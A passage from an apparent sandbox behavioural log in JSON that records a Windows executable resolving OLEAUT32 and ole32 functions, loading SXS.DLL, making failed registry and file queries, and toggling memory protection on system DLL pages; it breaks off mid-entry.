"2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "SafeArrayGetRecordInfo" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dfcbf0" } ], "repeated": 0, "id": 157 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "SafeArraySetRecordInfo" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dfcc40" } ], "repeated": 0, "id": 158 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "SafeArrayGetIID" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dfcbb0" } ], "repeated": 0, "id": 159 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "SafeArraySetIID" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dc0d80" } ], "repeated": 0, "id": 160 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "SafeArrayCopyData" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76daa3c0" } ], "repeated": 0, "id": 161 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "SafeArrayAllocDescriptorEx" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76daa630" } ], "repeated": 0, "id": 162 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "SafeArrayCreateEx" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dfca90" } ], "repeated": 0, "id": 163 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarFormat" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76e00260" } ], "repeated": 0, "id": 164 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarFormatDateTime" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76e003d0" } ], "repeated": 0, "id": 165 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarFormatNumber" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76e021f0" } ], "repeated": 0, "id": 166 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarFormatPercent" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76e022a0" } ], "repeated": 0, "id": 167 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarFormatCurrency" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76e00320" } ], "repeated": 0, "id": 168 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarWeekdayName" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76e025f0" } ], "repeated": 0, "id": 169 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarMonthName" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76e02340" } ], "repeated": 0, "id": 170 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarAdd" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dca890" } ], "repeated": 0, "id": 171 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarAnd" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dc09e0" } ], "repeated": 0, "id": 172 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarCat" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dc0470" } ], "repeated": 0, "id": 173 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarDiv" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76df2730" } ], "repeated": 0, "id": 174 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarEqv" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76df3090" } ], "repeated": 0, "id": 175 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarIdiv" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76df30d0" } ], "repeated": 0, "id": 176 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarImp" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76df3250" } ], "repeated": 0, "id": 177 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarMod" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76df3330" } ], "repeated": 0, "id": 178 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarMul" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dcb150" } ], "repeated": 0, "id": 179 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarOr" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76df3540" } ], "repeated": 0, "id": 180 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarPow" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76df2d70" } ], "repeated": 0, "id": 181 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarSub" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dcba20" } ], "repeated": 0, "id": 182 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarXor" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76df36e0" } ], "repeated": 0, "id": 183 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarAbs" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76df1bf0" } ], "repeated": 0, "id": 184 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarFix" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76df1ea0" } ], "repeated": 0, "id": 185 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarInt" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76df2050" } ], "repeated": 0, "id": 186 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarNeg" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76df2210" } ], "repeated": 0, "id": 187 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarNot" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76df3490" } ], "repeated": 0, "id": 188 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarRound" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76df2440" } ], "repeated": 0, "id": 189 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarCmp" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76da4c00" } ], "repeated": 0, "id": 190 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarDecAdd" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dc8400" } ], "repeated": 0, "id": 191 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarDecCmp" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dc8bf0" } ], "repeated": 0, "id": 192 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarBstrCat" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76da6900" } ], "repeated": 0, "id": 193 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarCyMulI4" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76dc7e30" } ], "repeated": 0, "id": 194 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "ModuleHandle", "value": "0x76d90000" }, { "name": "FunctionName", "value": "VarBstrCmp" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76da5160" } ], "repeated": 0, "id": 195 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "ole32.dll" }, { "name": "ModuleHandle", "value": "0x752d0000" } ], "repeated": 0, "id": 196 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ole32.dll" }, { "name": "ModuleHandle", "value": "0x752d0000" }, { "name": "FunctionName", "value": "CoCreateInstanceEx" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75162c70" } ], "repeated": 0, "id": 197 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ole32.dll" }, { "name": "ModuleHandle", "value": "0x752d0000" }, { "name": "FunctionName", "value": "CLSIDFromProgIDEx" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75176430" } ], "repeated": 0, "id": 198 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000000e4" }, { "name": "ValueName", "value": "SafeProcessSearchMode" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Session Manager\\SafeProcessSearchMode" } ], "repeated": 0, "id": 199 }, { "timestamp": "2025-02-27 23:34:13,862", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "filesystem", "api": "NtQueryAttributesFile", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1ffd3c13b7bd7f498e8.exe.cfg" } ], "repeated": 0, "id": 200 }, { "timestamp": "2025-02-27 23:34:13,878", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\SXS" }, { "name": "DllBase", "value": "0x739a0000" } ], "repeated": 0, "id": 201 }, { "timestamp": "2025-02-27 23:34:13,909", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "SXS.DLL" }, { "name": "BaseAddress", "value": "0x739a0000" } ], "repeated": 0, "id": 202 }, { "timestamp": "2025-02-27 23:34:13,909", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "SXS.DLL" }, { "name": "ModuleHandle", "value": "0x739a0000" }, { "name": "FunctionName", "value": "SxsOleAut32MapIIDOrCLSIDToTypeLibrary" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x73a09980" } ], "repeated": 0, "id": 203 }, { "timestamp": "2025-02-27 23:34:13,909", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x76e1d000" }, { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 204 }, { "timestamp": "2025-02-27 23:34:13,909", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x76e1d000" }, { "name": "ModuleName", "value": "OLEAUT32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 205 }, { "timestamp": "2025-02-27 23:34:13,909", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x75392000" }, { "name": "ModuleName", "value": "ole32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 206 }, { "timestamp": "2025-02-27 23:34:13,909", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x75392000" }, { "name": "ModuleName", "value": "ole32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 207 }, { "timestamp": "2025-02-27 23:34:13,909", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 208 }, { "timestamp": "2025-02-27 23:34:13,909", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 209 }, { "timestamp": "2025-02-27 23:34:13,909", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 210 }, { "timestamp": "2025-02-27 23:34:13,909", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 211 }, { "timestamp": "2025-02-27 23:34:13,909", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 212 }, { "timestamp": "2025-02-27 23:34:13,909", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" 